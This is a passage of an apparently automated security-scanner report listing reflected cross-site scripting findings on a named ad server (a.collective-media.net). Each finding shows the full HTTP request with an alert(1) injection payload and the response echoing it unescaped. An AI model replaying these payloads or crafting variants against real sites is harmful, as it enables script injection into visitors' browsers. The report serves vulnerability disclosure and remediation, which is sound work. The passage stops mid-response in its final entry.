4.8. http://a.collective-media.net/adj/ns.androidcentral/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357aa'-alert(1)-'b8febab7243 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150?&357aa'-alert(1)-'b8febab7243=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:33:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:57 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150?&357aa'-alert(1)-'b8febab7243=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/ns.androidcentral/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8006'-alert(1)-'5f898280ebd was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150?d8006'-alert(1)-'5f898280ebd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 492
Date: Tue, 10 May 2011 13:33:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150?d8006'-alert(1)-'5f898280ebd;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be56e'-alert(1)-'77633cd5bb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentralbe56e'-alert(1)-'77633cd5bb4/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:32 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentralbe56e'-alert(1)-'77633cd5bb4/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c26ad'-alert(1)-'dab6a35d7c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/generalc26ad'-alert(1)-'dab6a35d7c9/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 495
Date: Tue, 10 May 2011 13:36:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/generalc26ad'-alert(1)-'dab6a35d7c9/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f21e'-alert(1)-'99f2e7ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive9f21e'-alert(1)-'99f2e7ff;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 492
Date: Tue, 10 May 2011 13:36:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive9f21e'-alert(1)-'99f2e7ff;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/ns.androidcentral/general/archive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bf1'-alert(1)-'e03c47fd222 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150?&17bf1'-alert(1)-'e03c47fd222=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 499
Date: Tue, 10 May 2011 13:36:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:30 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150?&17bf1'-alert(1)-'e03c47fd222=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/ns.androidcentral/general/archive [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62ba3'-alert(1)-'f387749da89 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150?62ba3'-alert(1)-'f387749da89 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 496
Date: Tue, 10 May 2011 13:36:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150?62ba3'-alert(1)-'f387749da89;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 275b8'-alert(1)-'b4357d79cc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile275b8'-alert(1)-'b4357d79cc9/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Date: Tue, 10 May 2011 13:39:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile275b8'-alert(1)-'b4357d79cc9/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bd58'-alert(1)-'634864f9bca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general2bd58'-alert(1)-'634864f9bca;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:13 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:13 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general2bd58'-alert(1)-'634864f9bca;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/adj/ns.knowyourmobile/general [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd0b5'-alert(1)-'e62edcfbb0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736?&fd0b5'-alert(1)-'e62edcfbb0d=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 482
Date: Tue, 10 May 2011 13:39:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736?&fd0b5'-alert(1)-'e62edcfbb0d=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.18. http://a.collective-media.net/adj/ns.knowyourmobile/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94826'-alert(1)-'a4712a312f9 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736?94826'-alert(1)-'a4712a312f9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 479
Date: Tue, 10 May 2011 13:38:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:38:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736?94826'-alert(1)-'a4712a312f9;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.19. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 632cc'-alert(1)-'15cfcf94192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear632cc'-alert(1)-'15cfcf94192/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:14 GMT
Connection: close
